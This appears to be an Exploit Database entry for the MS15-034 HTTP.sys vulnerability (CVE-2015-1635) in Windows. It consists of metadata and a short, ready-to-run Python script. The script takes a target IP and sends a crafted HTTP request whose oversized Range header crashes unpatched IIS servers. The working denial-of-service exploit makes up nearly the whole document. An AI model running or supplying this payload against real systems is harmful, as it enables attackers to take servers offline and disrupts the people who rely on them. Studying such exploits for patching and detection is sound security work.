Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)
Author: laurent gaffie type: dos platform: windows port: 80.0 date_added: 2015-04-16 date_updated: 2015-04-16 verified: 0 codes: CVE-2015-1635;OSVDB-120629;MS15-034 tags: aliases: screenshot_url: application_url: raw file: 36776.py
#Tested on Win Srv 2012R2. import socket,sys if len(sys.argv)<=1: sys.exit('Give me an IP') Host = sys.argv[1] def SendPayload(Payload, Host): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((Host, 80)) s.send(Payload) s.recv(1024) s.close() #Make sure iisstart.htm exist. Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n" Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n" SendPayload(Init, Host) SendPayload(Payload, Host)